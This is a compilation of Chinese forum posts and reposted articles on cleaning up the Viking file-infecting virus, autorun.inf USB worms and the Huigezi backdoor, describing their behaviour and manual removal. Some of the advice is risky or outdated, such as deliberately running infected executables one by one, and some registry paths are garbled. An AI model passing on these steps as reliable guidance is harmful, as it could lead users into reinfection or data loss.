农夫专杀的病毒库需要更新..如果不是收录在病毒库内的威金无法查杀..如果有农夫专杀无法查杀的威金. 请压缩 样本(C:\WINDOWS\logo1_.exe 或者 C:\WINDOWS\uninstall\rundl132.exe) 发送 bin59420@yahoo.com.cn (压缩时候最好带上个密码 防止邮箱查杀) 中午到晚上 接到几个加几个..保证速度ing..

⒈ 萧心论坛威金专杀 作者:农夫

下载地址:http://www.mopery.ch/mopery/viking.rar

⒉ CHENOE Anit-Virus Tools 作者:魏滔序

下载地址:http://www.mopery.ch/mopery/weitaoxu.rar

⒊ 威金熊猫病毒终结器 作者:wangsea

下载地址:http://www.mopery.ch/mopery/wangsea.rar

瑞星 威金专杀

http://it.rising.com.cn/Channels ... 3119832d22607.shtml

毒霸 威金专杀

http://tool.duba.net/zhuansha/246.shtml

如果不是威金病毒..请不要使用这些专杀..出问题再次不负责..

经过了两天的日夜奋战，今天凌晨时终于把viking变种完全搞定。在之前在这里我也曾发过贴求助，但没有正确答案。所以在这里我把总结出的经验分享一下。

以下是我前两天的遭遇：

一次上网过后发现了一些可疑的进程。使用ecq-ps进程王来查看它们的路径，有些是病毒文件。有些则是通过正常系统进程如“svchost.exe csrss.exe“等作为勾子运行的dll和sys文件，我心里又想，这些小毛毒又来了，（我的系统装于04年，一直使用至今，中过无数次病毒，都被我统统搞定了，心想这次又来一个杀一个，来两个杀一双吧）。我用的双系统，重启进win98的dos手动删除以上路径的文件，再进winxp，删除以上文件相关的注册表键值。再进服务里边检查一下发现病毒残留的服务项目，还伪装得很好的。描述还和正常服务一个模样，什么管理系统应用程序的128位密钥传输的许可证服务。看了我都想笑。不过再看看源路径(文件名忘了)和依存关系，就露陷了。心想麻外行还可以。。二话不说machine\system\currentcontrol\sevices\下揪出来删！

重启，观察进程。一切恢复正常。喝口水。看会网络电视休息了。。可是就在这时真正的死神出现了。系统进程里突然暴出NN多病毒进程。瑞星也被关闭了，有些是刚才的有些不是。我慌了。先删除染毒的瑞星。(是昨天才升级的最新版啊）急忙用刚才的方法反复查杀多次，但每次启动后不久又会出现。。。且在98的纯dos下删除病毒文件时提示access denied（拒绝访问）时应该是内存驻留型的。于是冷启动再用windowsPE启动盘启动光盘里的PE操作系统，我想，PE内核都不一样，我看你还咱办。于是在PE里边删除病毒文件，果然这次启动进程恢复正常了。恢复完注册表。我就打开讯雷看一下我下载的工具软件，结果，又中标了。。。我开始总结：应该是把EXE文件感染了。不然怎么会无端多出些病毒进程出来。于是仔细看目录，发现被感染的exe文件下有exe.exe扩展名的文件，比如是acdsee.exe就会有acdsee.exe.exe并且文件图标丢失（不是网上说的那种在同目录下生成_desktop.ini文件，那是老版维金。我这个也有_desktop.ini，不过在c:\下，而且在D盘还会生成autorun.inf 及iexplorer.pif文件) 于是删除所有*.exe.exe文件，再次光盘启动删毒。这下进程虽然又恢复正常了。但是桌面上大多数的图标变成白的了。。心想这下完了，病毒感染了大多数exe文件。很多年没有遇到这样了。我又不敢启动这些程序，一启动包又中标，于是我安卡巴。安了6。0307，升级最新，安全模式下扫，正常模式下扫。。扫不出一点东西。又安6。04XX 还安5XXbeta最新的了，中英文都安过了，，扫不出。。。。。。。。。怒火！！！！（网上明明说卡巴扫得到的，我想都是针对旧版维金吧）于是再来卖咖啡(mcafee)，在线升级mcafee,扫描。。。结果卖咖啡也卖不脱。。。暴怒！！！！再于是找到金山、瑞星的专杀工具来，也是一个扫不到。。。狂怒！！！！。。我看了一下win98se\setup.exe的文件大小，和源光盘里的文件比较足足多了近60K。而且每个受感染的文件都同样多了近60K ，证明感染的是都是vking！！。。。江民的专杀工具能杀，不过还好我点停止点得快。。。因为我看了一下，它的所谓杀大多数都是删除！！！删除了我好几个exe文件呢。就算保留，保留下来的也是不能运行的僵尸文件。什么exe修复机根本不顶用。一边凉快！！

这下完了。绝望。这么多exe文件，打死我也不愿意格盘删'除。

在网上看了一下维金的免疫方法。突然想起什么。。经过自己内心激烈的思想斗争于是作出了以下决定：

我做了个试验,先将C盘做了个ghost,然后双击一个感染文件,系统进程出现viking,然后被双击这个exe文件图标,大小恢复正常.进程里首先出来三个文件。ghost恢复恢复。。这下有点眉目了

就是在病毒原有目录下建一些0字节txt文件,改成病毒进程名,如:logon_1.exe 伪装一下,把它们改成只读,然后一个一个的点exe文件,让EXE文件中的异常代码释放入内存，再结束相应进程

说干就干。仿照先前三个文件在c:\windows\建立 logon_1.exe richdll.dll （有些维金版本不是这个dll名字，变种有不同。路径也不同。但原理相同）再在C:\windows\unistall下建立 RUNDL132.exe ，设只读

找出所有exe文件，网上说过只感染27Kb到10mb的exe文件，可我的10多20mb的文件也中标了，再次证明不是网上说的那种viking。。。开始 一 一双击释放。。。。。就这样。。。就这样。。它们快乐地流浪，就这样。它们为爱歌唱。。。狼爱上。。。。啪！！完了跑题挨臭鸡蛋了。

*.*

不是。。我只是形容一下上千个文件一 一打开的漫长。。过了几个小时后。终于完成。。舒展下酸痛的腰。。重建图标缓存。。。。冷启动。。。

。。。。。。。。大功告成。。。至此。全部viking一个不留

已经很久没有这样fighting过了

经过了这么长时间的周旋。已经对这个变种病毒的原理有初步了解。以下列出本人总结出的该病毒特征及清除方案：

viking"维金"病毒 变种

应该算一个木马。互联网高度发展的产物

首先在被种植机器的系统盘下\windows目录下生成logon_1.exe RUNDL132.exe 还有一个dll文件，我的是richdll.dll，还有网上说的dll.dll vtd.dll什么五花八门的，反正就是dll文件,并加载入系统进程。删除不掉.

这些文件相互关联，结束进程并删除后马上又会出现。

自动禁用杀毒防火墙，并且感染防火墙文件

然后调用net share 命令打开$ipc命名管道共享。以传播到局域网上其它机器上.

释放出诸如rundll32.com services.exe finder.com iexplore.pif regedit.com dxdiag.com

msconfig.com mhs.exe等文件,并修改注册表exe文件，网站链接，scr文件，未知（打开方式）文件，等常用文件的关联为iexplore.pif或以上的其它某个病毒程序.将exe文件改为自创的winfile文件类型，从而让每个exe文件运行时同时调用病毒，这招太狠了；更改文件查找检索方式关联为finder.com ；把原本用rundll32.exe文件调用的程序，如网上邻居属性，通过注册表改为带有rundll32.com的命令行。在 Hkey_local_machine或hkey_current_user\software\microsoft\windows\currentversion\run键值下添加名为load等字样的木马加载项。在currentversion\logon下也有。。。另外还改了些其它键值，这些只是较明显的。

检测可用驱动器。在其中生成_desktop.ini 或autorun.inf iexplore.pif 让双击操作变为“自动播放病毒”所以只能右击打开了。。。

最最可恨的就是感染所有驱动器上大于大约27KB的exe文件。加上约60KB的数据，文件图标丢失，目的在于被清除病毒后通过exe文件复活，当调用该句柄时自我释放为logon_1.exe rundl132.exe

并且恢复exe文件以便让它正常运行。。。

同时会自动从网上下载多达几十种其它类型的病毒，QQ盗号木马，热门网络游戏木马。至此，taskmgr任务管理器一团糟。。

因为木马众多会影响清除效率及难度，内存占用超大，危险系数也大。这点不得不佩服。。

如果你的系统有以上状况，那么请follow they step:

首先你断开internet网,删除杀毒软件。因为它已被病毒感染，它在内存里只是添麻烦而已

重新安装杀毒软件，比较可以的有卡巴斯基、mcafee、江民，推荐用卡巴，安完马上重启。不要停留不然新的杀软会又中标的。安全模式下因为不能启用msiexec所以很多软件安不了

冷启动或关机，拨电源也可，待光电鼠标灯不亮了再开机（呵呵太夸张了)

进入带网络连接的安全模式，（如果不能上网就还是进正常模式），用文件夹选项里面打开显示所有文件；取消隐藏系统文件复选框，选中显示已知文件扩展名；下载viking专杀工具，这里推荐江民的。下载"瑞星卡卡助手"用于以后修复注册表，如果为exe文件最好改下后缀名。以后运行时再改回来。升级杀毒软件为最新版。升了马上重启进入纯安全模式，只运行系统盘扫描。扫到的病毒名及路径用笔记下来。

冷启动。。光盘或U盘启动dos，查找刚才记下来那些文件，有就删。我用的是windowsPE启动盘启动。所以免去了dos命令带来的麻烦，最主要要找到并删除上文说到的那些文件，这里很关键，一定要仔细找。

进入安全模式，运行regedit.exe （记住一定要输入.exe，因为如果没删干净，exe文件会被再度被作为winfile文件类型中的病毒命令行打开。）

按ctrl+f查找以上述文件的文件名的键值删除。

进入正常模式，这时可能因为杀毒引起不能上网了，用刚才下载的“瑞星卡卡助手”修复IE和注册表吧。顺便也扫一下刚才可能viking下载有的其它木马及残留（切记不要启动宽带拨号程序，因为Enternet500这类拨号程序己被感染，如果是xp下的默认拨号，也最好不要去动）

接下来进程应该干净了，就要处理被感染的exe文件了，如果你不想要这些文件可以选择直接用专查工具把它们杀烂，或查找直接删除，还省了下边的步骤。因为以下步骤最安全但容易累死人

仿制logon_1.exe rundl132.exe richdll.dll

新建文本文档.txt，建三个，分别改为以上三个文件名。并且设为只读。放在平时它们感染的目录下。目录位置上文己提及。目的用于免疫，防止染毒exe文件释放出同名病毒文件。

也可使用gpedit.msc，组策略中用户配置\管理模板\系统\不要运行windows程序中，启用并添加logon_1.exe

rundl132.exe

也可使用mcafee杀毒软件中的文件规则，禁止在硬盘中新建*.exe *.com 文件

后两种限制方法我没试过，但理论上说是成立的

接下来按顺序分别查找每个盘上的exe文件。按大小排列结果，降序排列。旁边打开个任务管理器窗口，记下任务条目及数量。如进程数：22

双击空白图标exe文件，注意任务管理器变化。例：如果双击game.exe则， 已染毒现象：任务管理器会多出一个进程叫game.exe 这时你再双击。或反复再双击。会看到又会多出game.exe，如果是基于16位兼容模式的程序，会出现一个ntvdm的进程，不影响，可结束。稍后你可能会发现net 和 net1 进程一闪而过，持续不到1秒，而后出现一个或多个cmd进程。这时请结束所有game.exe,cmd进程也会结束。病毒从内存中得到释放。可以再次双击如果不再产生cmd进程或能恢复正常图标，或能正常运行，证明该文件不再带毒。第二种情况：game.exe一会自动消失

或每双击一次多出一个game.exe而没其它进程。说明此文件未被感染

一个一个分区，一个一个文件的测试。修复。当然，你要是烦了，可以将不重要的文件放一边。专心找自己心爱的exe文件。反正剩下的不重要的exe文件就留给江民专杀来杀烂得了。。无所谓

辛苦工作完成后，也不必要重启，打开江民专杀来清理漏网之鱼吧。

查毒软推荐使用Mcafee（卖咖啡），查毒功能较强，且最强最具特色最实用之处在于他可以像设置IP安全策略那样设置禁止任何类型文件的建立，写入，修改，甚至读取！！，这在我们访问不可信站点或发现有木马苗头的时候大有帮助。即使查不出来我也不准你建文件改文件！强吧？？

缺点就是占用内存资源太高，优化版的我都发现有七个进程。。晕。。。鱼和熊掌不可兼得啊。。

写了这么多，我尽量想到的都想到了。我曾如此辛苦，故不希望大家都绕弯路。但愿对大家有所帮助。

最后发表我的一点看法，杀毒软件只是一个辅助工具。每个厂商的杀软都有优点有缺点。很多人就是把杀软看成无敌的了。认为中了毒，清一色杀毒扫描的做法。其实，很多时候甚至是心理安慰，障眼法。。我是从dos时代一路走来的，中过多种病毒。看到老师们用pctools及debug手动杀过不少毒，总结出：手动才是王道！！手动万岁。。

在E时代，我们要发扬取长补短的做法，把杀软的效率化，全面化，结合人工的仔细，灵活。这样才能尽心尽力像对待生活那样对待电脑

三点高招教你解除闪存盘内的病毒！

三点高招教你解除闪存盘内的病毒！

Pchome 【转载】

赤手空拳对付病毒

　　时下，我们常常会在硬盘的各个分区根目录下面看到“Autorun.inf”这样的文件，并且用鼠标双击磁盘分区图标时，往往无法打开对应分区窗口;遭遇类似上述现象时，那几乎就能断定本地计算机系统已经感染了近来非常猖獗的闪盘病毒，这种病毒一般通过“Autorun.inf”文件进行传播，只要我们双击闪盘分区图标时，该病毒就会通过“Autorun.inf”文件中的设置来自动激活病毒，然后将“Autorun.inf”文件同时拷贝到其他分区，导致其他分区都无法用双击鼠标的方法打开。为了保护系统安全，本文下面就为各位献上这类病毒解除方法以及预防措施，希望下面内容能对大家有用!

　　赤手空拳，删除“Autorun.inf”文件

　　当计算机系统不小心感染了“Autorun.inf”文件病毒时，该病毒就会自动在本地硬盘的所有分区根目录下面创建一个“Autorun.inf”文件，该文件在默认状态下具有隐藏属性，用普通方法是无法直接将它删除掉的。要想删除“Autorun.inf”病毒文件，我们可以按照如下方法来操作：



图1

　　首先用鼠标双击系统桌面中的“我的电脑”图标，在其后弹出的窗口中依次单击“工具”/“文件夹选项”菜单命令，打开文件夹选项设置窗口，单击该窗口中的“查看”标签，并在对应标签页面中选中“显示所有文件和文件夹”项目，同时将“隐藏受保护的操作系统文件”的选中状态取消掉，再单击“确定”按钮，这么一来“Autorun.inf”病毒文件就会显示在各个分区根目录窗口中了;

其次用鼠标右键单击“我的电脑”窗口中的某个磁盘分区图标，从弹出的快捷菜单中执行“打开”命令，进入到该分区的根目录窗口，在其中我们就能看到“Autorun.inf”病毒文件的“身影”了;再用鼠标右键单击“Autorun.inf”文件，并执行右键菜单中的“打开”命令将“Autorun.inf”文件打开，随后我们就会看到里面的“open=xxx.exe”内容，其实“xxx.exe”就是具体的病毒名称。倘若这类病毒没有进程保护时，我们只需要将“xxx.exe”文件以及各个“Autorun.inf”文件直接删除掉，就能将闪盘病毒从系统中清除掉了;

　　下面为了防止病毒再次运行发作，我们还需要将遭受病毒破坏的磁盘关联修改过来。在修改磁盘关联时，必须先依次单击“开始”/“运行”命令，打开系统运行对话框，在其中执行注册表编辑命令“regedit”，打开本地系统的注册表编辑窗口;在该编辑窗口的左侧显示区域，先用鼠标展开“HKEY_CLASSES_ROOT”注册表分支，然后在该分支下面依次选择“Driveshell”项目，在对应“shell”项目的右侧列表区域(如图2所示)，用鼠标双击“默认”键值，在其后弹出的数值设置窗口中将“默认”键值数值修改为“none”;



图2

　　接下来再用鼠标展开“HKEY_CURRENT_USER”注册表分支，然后在该分支下面依次选择“SoftwareMicrosoftWindowsCurrentVersionExplorer”项目，在对应“Explorer”项目的右侧列表区域，检查一下是否存在一个名为“ountPoints2”键值，一旦发现该键值的话，我们必须及时将它删除掉，最后按一下键盘上的F5功能键，来刷新系统注册表的设置，这么一来闪盘病毒就被我们手工清除掉了，此时当我们再尝试用双击方法打开分区窗口时，就会看到对应分区窗口能被正常打开了。

借用外力抑制病毒再生

　　借用外力，抑制闪盘病毒再生

　　倘若我们的计算机不小心中了闪盘病毒的黑手，尝试使用上面的方法无法删除“Autorun.inf”文件，而且重新安装了计算机系统后仍然无法使用双击鼠标方法打开分区窗口时，我们可以选用一款名为“费尔木马强力清除助手”的工具，来让本地系统摆脱闪盘病毒的“干扰”，并且有效抑制该类型病毒的继续发作。下面就是抑制闪盘病毒再生的具体操作步骤：

　　首先从网上将“费尔木马强力清除助手”工具下载到本地硬盘中，并对它进行正确安装;安装完毕后，直接运行“费尔木马强力清除助手”程序，在其后弹出的程序界面中选中“抑制文件再次生成”项目，同时在“文件名”文本框中输入“Autorun.inf”文件的具体路径信息，例如笔者在这里输入“C:Autorun.inf”，再单击“清除”按钮，这么一来C分区下面的“Autorun.inf”文件就被清除干净了;按照相同的操作方法，再将其他分区中的“Autorun.inf”文件删除干净。

　　接着我们再按常规方法重新安装一下操作系统，或者直接通过Ghost程序来快速恢复一下系统，相信这么一来重装过后的系统就会摆脱闪盘病毒的“干扰”了。

　　小小巧招，预防闪盘病毒再次袭击

　　当摆脱了闪盘病毒的“干扰”后，我们现在是不是就可以高枕无忧了呢?其实，闪盘病毒随时可能再次袭击我们，为此我们必须采取有效措施，让本地系统远离闪盘病毒。而要预防闪盘病毒再次袭击的方法非常简单，我们只需要在闪盘根目录下面自己手工创建一个“Autorun.inf”文件，这样一来闪盘病毒日后就无法往闪盘根目录下面自动生成“Autorun.inf”病毒文件了，毕竟相同的目录下面是不允许创建同名文件或同名文件夹的，那样的话闪盘病毒就无法通过闪盘进行非法传播了。同样地，这种预防闪盘病毒的方法也适用于移动硬盘!

教你如何应对杀除病毒时提示清除失败

作者：lllzc　来源：赛迪网安全社区

很多网友在保卫自己的爱机时，不管使用了哪些杀毒软件，几乎都会碰到储如此类的问题，如：

★清除病毒失败怎么办？

★杀毒出现清除失败怎么办？

★清除失败或未解决病毒怎么办？

★发现病毒时提示“删除失败”，怎么办？

★发现病毒时提示“清除失败”，怎么办？

★系统中了病毒、木马、蠕虫，清除、隔离、删除失败怎么办？

产生这些问题的主要原因在于：

1、病毒正在使用中；

2、病毒防止杀毒软件清除而做的自我保护；

3、病毒中有守护进程在保护病毒。

简单解释下这其中的原因：

1、这是较早期的杀毒软件无法清除病毒时的提示，比如一个文件，如果你正在打开使用它时，你是没有办法删除这个文件的， 因为文件正在使用中，受到系统正常的保护；同样病毒进程如果没有终止掉，直接删除病毒文件的话，同样会提示该信息。

2、 原因2与原因3可以归类来说，简单地讲，就相当于病毒躲在巨人的身后，你想要抓住这个“病毒”，首先要打败这个“巨人”，否则就会受到“巨人”的干扰而让你无法顺利抓到这个“病毒”。同样地，病毒为了防止自己不被杀毒软件查杀、剿灭，而使用了如：权限提升到系统级、阻止病毒进程被终止、阻止病毒体被删除、电脑中同时存在2个以上的病毒，相互负责监控对方，如发现自己的保护对象不存在了，重新生成新的病毒体。

解决办法：

1、 重新启动电脑进入操作系统的安全模式， 使用杀毒软件清除或手工删除病毒体。

2、 使用终截者抗病毒中的“安全回归”功能，在电脑重新启动的同时迅速将病毒隔离，之后，你可以通过杀毒软件清除或手工删除。

小插曲：什么是安全回归？

安全回归看似是“重新启动”,它主要是针对目前许多恶意病毒无法彻底查杀，在每次电脑开机启动后又重新发作的问题，安全回归行为识别技术提供一个快速解决方案。用户只须轻点击“安全回归用户电脑将在一次重新启动电脑的过程中恢复到一个无病毒、无流氓软件运行的安全状态，并告知用户已经拦截了哪些危险程序，整个过程的感觉就像是上天给予了一次安全重来的机会。

安全回归基本原理

安全回归在计算机开机启动过程中，识别和判断所有将要运行的程序，包括病毒、木马等恶意程序，只允许运行合法的系统程序和用户在安全回归许的程序，其它的一律禁止。这样可以保证：

1、电脑启动完成后，没有任何病毒及流氓软件正在运行，同时也抑制了所有病毒程序对电脑破坏；

2、不用担心病毒程序先于安全回归运行，它有一夫当关，万夫莫开之功效；

3、使用安全回归不会删除用户任何数据，请用户放心使用。

安全回归可以解决什么问题？

1、解决顽固木马、病毒无法清除，或反复清除失败的问题；

2、拒绝流氓软件困扰、减少弹出窗口的干扰；

3、禁止了与安全无关的进程、服务及插件的运行，加快了系统运行速度。

揭示灰鸽子(Gpigeon/Huigezi)七宗罪 不可不知的病毒解决方案

参考阅读

另类破解灰鸽子连接密码
系统安全之教你手工清除灰鸽子Vip2005
实战录　一次对顽固灰鸽子的查杀
GPigeon灰鸽子2006版的手动查杀
这个马儿太厉害 浅析灰鸽子的防范与清除
灰鸽子VIP2006清除方法 黑客通过"灰鸽子"盗银行密码 判刑10个月
用iris分析中鸽子后的反入侵 关于中了鸽子后的反入侵跟踪
关于HijackThis日志发现灰鸽子的处理方法 怎样挡住灰鸽子（Backdoor.Gpigeon）--SSM 你中了灰鸽子吗？ “灰鸽子”网页木马从原理、制作到防范 灰鸽子2006手工查杀
灰鸽子2006VIP亲密接触-分析-清除
灰鸽子木马来源追踪 手工清除灰鸽子 Vip 2005


灰鸽子病毒英文名为win32.hack.huigezi，这个木马黑客工具大致于2001年出现在互联网，当时被判定为高危木马，经过作者的不懈努力，该病毒从2004年起连续三年荣登国内10大病毒排行榜，至今已经衍生出超过6万个变种。

　　认识灰鸽子：

　　几乎所有人都知道熊猫烧香，就是因为这个病毒有个明显的图标。而灰鸽子木马病毒入侵系统后，只有非常有经验的电脑用户才可能发现异常，普通用户根本毫不知情，就好比有个会隐形术的贼在你家中长驻。

　　灰鸽子病毒的文件名由攻击者任意定制，病毒还可以注入正常程序的进程隐藏自己， Windows的任务管理器看不到病毒存在，需要借助第三方工具软件查看。

　　中灰鸽子病毒后的电脑会被远程攻击者完全控制，具备和你一样的管理权限，远程黑客可以轻易的复制、删除、上传、下载保存在你电脑上的文件，机密文件在你毫不知情的情况下被窃取。病毒还可以记录每一个点击键盘的操作，你的QQ号、网络游戏帐号、网上银行帐号，可以被远程攻击者轻松获得。更变态的是，远程攻击者可以直接控制你的摄像头，把你家里拍个遍。并且，远程攻击者在窃取资料后，还可以远程将病毒卸载，达到销毁证据的目的。这好比隐形的贼在你家拿走东西，大大方方的从隐形的门走出去，而你却根本不知道自己丢了东西。

　　灰鸽子如何传播？

　　灰鸽子自身并不具备传播性，一般通过捆绑的方式进行传播。灰鸽子传播的四大途径：网页传播、邮件传播、IM聊天工具传播、非法软件传播。

　　网页传播：病毒制作者将灰鸽子病毒植入网页中，用户浏览即感染；

　　邮件传播：灰鸽子被捆绑在邮件附件中进行传播；

　　IM聊天工具传播：通过即时聊天工具传播携带灰鸽子的网页链接或文件。

　　非法软件传播：病毒制作者将灰鸽子病毒捆绑进各种非法软件，用户下载解压安装即感染。

　　灰鸽子七宗罪

　　1. 盗号

　　灰鸽子入侵用户电脑后，可通过键盘记录器等手段记录用户的键盘输入信息，无论是QQ、网络游戏、网上银行的账号密码都难逃被盗厄运。热门网络游戏魔兽争霸曾发生一个区服大量账号短时间内被盗，引起数千玩家集中投诉;此外，2006年10月，BTV7《生活面对面》节目报道网银账户内1万余元被分15次盗走，警方在事主的电脑查获灰鸽子病毒。

　　2. 偷窥隐私

　　灰鸽子可通过远程控制用户电脑上的摄像头偷窥用户隐私。只要用户的机器处于开机状态，远程操控者就可以自动开启用户的摄像头，窥探用户隐私。知道自己家里隐藏了一只远在千里之外的眼睛，肯定会令你毛骨悚然。

　　3. 敲诈

　　黑客利用灰鸽子病毒完全控制被感染者电脑，电脑中的任何文件都可以任意处置，黑客一旦发现对用户比较隐私或机密的东西，立刻将其转移到其他地方，然后对用户进行勒索，与现实生活中的敲诈一样，利用网络进行偷窃、敲诈的行为同样是违法行为。3月7日，BTV1《法制进行时》曾报道江西瑞金一男子使用木马程序盗走受害人裸照，并向事主索要14万元人民币，最后这名男子以敲诈勒索罪被判有期徒刑6年。

　　4. 发展“肉鸡”

　　电脑被人植入木马，这台主机，就被称为"肉鸡"，远程攻击者可以对这台"肉鸡"电脑为所欲为。攻击者可控制大量"肉鸡"，进行非法获利，比如在"肉鸡"上植入点击广告的软件；利用肉鸡配置代理服务器，以此做为跳板对其它电脑发起入侵。一旦最终受害者追查时，肉鸡电脑将会成为替罪羊；此外，还可以用大量肉鸡组建僵尸网络，随时可以被用于一些特殊目的，比如发起DDoS攻击等。可以想象，如果大量肉鸡被敌对势力控制，将会对我国的网络安全造成什么样的后果。

　　5. 盗取商业机密

　　通过一些非法途径让那些存放商业机密的电脑感染到灰鸽子，接下来，攻击者窃取有价值的商业文件、机密文件、个人隐私数据等等。攻击者可以偷偷将商业文件进行贩卖，充当商业间谍。如果是国家机密因此受损，后果将不堪设想。

　　6. 间断性骚扰

　　感染灰鸽子病毒后，远程攻击者任意玩弄你的电脑，比如任意打开和关闭文档，远程重启电脑，使您无法完成正常任务。

　　7. 恶搞性破坏

　　看谁不顺眼，就可以肆意搞破坏，攻击者可利用灰鸽子对被感染的用户电脑为所欲为，修改注册表、删除重要文件、修改共享、开启代理服务器、下载病毒等等，试想如果你电脑的注册表被恶意篡改、系统文件被删除，而且电脑中还被放了大量病毒，你的电脑将如何？

　　预防：

　　灰鸽子病毒泛滥已经数年，变种数万，因为病毒具备很好的隐形特性，让人觉得防不胜防。建议网友注意以下几点：

　　1. 金山毒霸的用户建议使用漏洞扫描修复功能安装系统补丁，在毒霸弹出提醒安装补丁的对话框时，一定要点安装。不是毒霸的用户可以使用Windows Update进行修补。特别注意安装IE浏览器的补丁程序，很多灰鸽子是攻击者故意把病毒放在带漏洞攻击程序的网站上，有漏洞的机器访问这些网站就会中毒。

　　2. 及时升级杀毒软件，注意检查你使用的杀毒软件是否过期，使用盗版杀毒软件（或者一个正版ID用在多台计算机上），是不能正常升级的，特别需要检查。

　　3. 对朋友或陌生人发送来的可疑程序不要运行，别被对方的谎言蒙骗。

　　4. 关闭所有磁盘的自动播放功能，避免插入带毒U盘，移动硬盘，数码存储卡中毒。

　　完全解决方案：

　　由于灰鸽子本身的隐蔽性很强，用Windows系统自带的工具，很难发现灰鸽子入侵。那我们如何去发现电脑中已经被植入的灰鸽子病毒呢？

　　1. 金山毒霸数据流杀毒方案

　　毒霸2007查杀灰鸽子的操作方法

　　第一步：升级金山毒霸到最新版本。

　　第二步：执行全盘查杀病毒，查杀灰鸽子病毒及全部变种。

　　第三步：确保毒霸实时监控在运行状态，一旦灰鸽子入侵，金山毒霸会及时拦截。



图1：金山毒霸2007剿灭灰鸽子病毒

　　2. 灰鸽子病毒专杀工具



　　金山毒霸提供了免费的"灰鸽子"专杀工具，将数据流查杀技术集成到这个专杀工具中，可完全清除各种经过特殊变形处理的灰鸽子病毒。

　　3. 手工杀毒

　　需要借助工具软件：冰刃。一般用户无法根据进程列表看出哪个是病毒，你可以启动冰刃的同时，打开任务管理器，比较一下，看冰刃里多出的一个进程，可能就是灰鸽子病毒。进程名如果是假冒word、记事本的图标，需要重点关注。



图2：结束病毒进程

　　选中上图G_server2007进程，单击右键，结束进程。结束进程后，我们直接根据上图冰刃的提示，点冰刃左边的文件，浏览到上图程序名称提示的文件夹，找到g_server2007.exe和g_server2007.DLL（灰鸽子中毒后的文件名各不相同，是由攻击者定制的，应尽可能根据冰刃提示的路径去查找。有的版本带有_hook.dll，可以查看下文件日期，应该是同时生成的。）点击右键，彻底删除掉。



图3：彻底删除病毒残留

金山雷军：誓将围剿灰鸽子正义行为进行到底

　　3月14日晚22点，金山毒霸官方网站遭遇恶性木马团伙疯狂攻击。金山软件总裁雷军基于此事发表严正声明：面对以“灰鸽子”为首的恶性木马团伙的打击报复，金山绝不退缩，誓将围剿恶性木马灰鸽子的正义行为进行到底。

　　3月14日，金山软件展开了一场“全民围剿恶性木马”的行动。由于金山此举将彻底斩断制作、贩卖木马者的利益来源，3月14日晚，以灰鸽子为首的木马团伙开始疯狂报复。该团伙通过毒霸网站正在使用的一家镜像服务供应商的服务器对毒霸的官方网站进行猛烈攻击。

　　3月13日一位自称是灰鸽子工作室成员的男人，在获得金山毒霸反病毒工程师手机号码后，致电该工程师并称，“请慎重考虑打击灰鸽子的后果”；3月14日夜22点某恶性木马团伙开始调动其掌控的上万台“肉鸡”构成的“僵尸网络”对金山毒霸官方网站进行疯狂攻击。三个小时后毒霸官网恢复正常。

　　3月14日夜22点开始，金山毒霸工作员截获分别来自台湾、河北廊坊、河北横水、北京朝阳等众多地区IP的上万台计算机针对www.duba.net域名的攻击。金山毒霸工作人员发现这些IP都是被操纵的“肉鸡”，幕后黑手非常熟悉DNS操作，为防止被毒霸工作人员追踪，以秒为单位不停切换“肉鸡”，更换IP地址，并且在毒霸网站正在使用的一家镜像服务供应商的服务器中植入了变种木马。网站受攻击期间，造成浏览金山毒霸官网的部分用户被挟持到幕后黑手指定的不法网站。金山毒霸工作人员紧急调整服务器配置，三小时后毒霸官网恢复正常。

　　自2001年，灰鸽子诞生之日起，就被反病毒专业人士判定为最具危险性的后门程序，并引发了安全领域的高度关注。2004年、2005年、2006年，灰鸽子木马连续三年被金山等国内杀毒厂商评选为年度十大病毒。仅2007年2月一个月就感染超过25万台计算机，占感染计算机总台数的12.5%。尤其因为其具有极强的隐蔽性和欺骗性，导致用户容易在毫无察觉的情况下沦为被灰鸽子操纵的“肉鸡”。

　　目前针对以“灰鸽子”为首的木马团伙的疯狂报复，金山工作人员已连夜向国家有关部门报告了案情，要将此次在两会期间顶风作案的恶性打击报复事件追查到底。

灰鸽子病毒的前世今生　揭示灰鸽子发展简史

　　连续三年被国内各大杀毒厂商评选为年度十大病毒，灰鸽子作为最具危险性的后门程序，是如何成为国内极具影响的十大病毒、甚至毒王的呢？且看灰鸽子病毒的“前世近生”。

　　自2001年，灰鸽子诞生之日起，就被反病毒专业人士判定为最具危险性的后门程序，并引发了安全领域的高度关注。2004年、2005年、2006年，灰鸽子木马连续三年被国内各大杀毒厂商评选为年度十大病毒，灰鸽子也因此声名大噪，逐步成为媒体以及网民关注的焦点。人们在震惊于灰鸽子给广大电脑用户带来的危害的同时，不禁要问，灰鸽子是如何从一个模仿其他病毒开始，发展成为国内极具影响的十大病毒、甚至毒王的呢？

　　灰鸽子自2001年出现至今，主要经历了模仿期、飞速发展期以及全民黑客时代三大阶段。

模仿期 飞速发展期 全民黑客时代

2001年-2003年 2004年-2005年 2006年-2007年

　　　　模仿期（2001年-2003年）

　　2001年，国内互联网逐步走向普及，网络病毒也伴随着互联网的发展日益取代传统意义上的病毒，而到了2002年，以“电子邮件”、“网络下载和浏览”等方式传播的病毒开始大量涌现，互联网安全成为大众关注的焦点。

　　与此同时，随着网络的普及，人们已经可以足不出户的工作和学习，SOHO越来越受到人们的青睐。有了网络我们可以在城市的一边使用计算机控制另外一边的计算机，从而不用我们花费大量精力亲自到机房操作服务器，远程控制管理软件也由此诞生。

　　2002年，远程控制软件已经步入了成熟阶段，是网管人员必备的工具。但同时一些带有恶意行为的远程控制软件（后门）也在互联网中流传，其中国内最为著名的就是“冰河”木马后门。“冰河”在当时被泛滥的用于控制各种网络服务器，在黑客成功攻陷一个服务器后，都会被安装上“冰河”的服务端，2002年的中国10大病毒中，位列第三位。

　　而灰鸽子最早出现的时候就是在模仿“冰河”。“灰鸽子”是2001年出现的，采用Delphi编写，最早并未以成品方式发布，更多的是以技术研究的姿态，采用了源码共享的方式出现在互联网，至今仍可搜索到“灰鸽子”早期版本的源码。“灰鸽子”在出现的时候使用了当时讨论最多的“反弹端口”连接方式，用以躲避大多数个人网络防火墙的拦截。“灰鸽子”在当时的名气不及“冰河”，因此只出现了少量的感染，但其开放源码的方式也让“灰鸽子”逐渐增大了传播量。

　　灰鸽子出现后以源码开放，所以出现多种不同的版本，由于服务端都以隐藏方式启动，就奠定了其恶意后门木马的地位，当时，以金山毒霸为首的大部分安全厂商将对用户上报和监测到的“灰鸽子”服务端都认定为“黑客程序”，并坚决查杀，在一定程度上遏制了灰鸽子的发展速度。

　　飞速发展期（2004年-2005年）

